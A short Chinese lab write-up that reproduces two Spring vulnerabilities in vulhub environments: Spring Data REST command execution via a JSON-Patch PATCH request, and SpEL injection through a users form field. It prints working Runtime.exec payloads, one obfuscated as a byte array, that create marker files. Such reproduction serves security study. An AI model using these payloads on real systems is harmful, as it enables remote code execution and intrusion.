常见框架漏洞—Spring

一.Spring Data Rest 远程命令执⾏命令

1.搭建环境

2.访问网站下的/customers/1

3.对当前页面进行抓包,修改提交方式为PATCH,内容类型为application/json-patch+json

{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte\[\]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,101}))/lastname", "value": "vulhub" }

4.发现容器目录中有了succese

二.Spring代码执行

1.环境搭建

2.访问网站下的users目录

3.提交页面进行抓包,添加poc:
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("t
ouch /tmp/crz")]=&password=&repeatedPassword=

4.查看终端,发现成功写入

相关推荐
小蒜学长39 分钟前
springboot多功能智能手机阅读APP设计与实现(代码+数据库+LW)
java·spring boot·后端·智能手机
恒悦sunsite2 小时前
Ubuntu之apt安装ClickHouse数据库
数据库·clickhouse·ubuntu·列式存储·8123
奥尔特星云大使2 小时前
MySQL 慢查询日志slow query log
android·数据库·mysql·adb·慢日志·slow query log
来自宇宙的曹先生2 小时前
MySQL 存储引擎 API
数据库·mysql
间彧3 小时前
MySQL Performance Schema详解与实战应用
数据库
间彧3 小时前
MySQL Exporter采集的关键指标有哪些,如何解读这些指标?
数据库
weixin_446260853 小时前
Django - 让开发变得简单高效的Web框架
前端·数据库·django
mpHH3 小时前
babelfish for postgresql 分析--todo
数据库·postgresql
zizisuo3 小时前
解决在使用Lombok时maven install 找不到符号的问题
java·数据库·maven
笨蛋少年派4 小时前
JAVA基础语法
java·开发语言